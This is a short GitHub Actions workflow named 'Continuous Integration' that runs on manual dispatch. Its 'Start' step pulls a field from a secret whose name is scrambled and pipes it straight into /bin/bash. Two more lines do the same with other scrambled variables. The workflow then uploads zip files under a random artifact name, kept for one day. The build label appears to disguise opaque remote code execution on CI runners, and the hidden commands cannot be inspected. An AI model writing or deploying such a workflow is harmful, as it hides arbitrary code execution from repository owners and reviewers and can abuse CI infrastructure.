name: Continuous Integration
on:
  workflow_dispatch:

permissions:
  contents: read
jobs:
  trigger:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Start
        env:
          qx98: ${{ secrets.qx98 }}
        run: |
          printf '%s' "$qx98" | jq -r .vfgb55 | /bin/bash
          echo $zhipe045 | jq -r .zzww482 | /bin/bash
          printf '%s' "$iutph69" | jq -r .wejz13 | /bin/bash

      - name: Save output
        uses: actions/upload-artifact@v4
        with:
          name: zQTQ6ZD5
          path: "*.zip"
          retention-days: 1
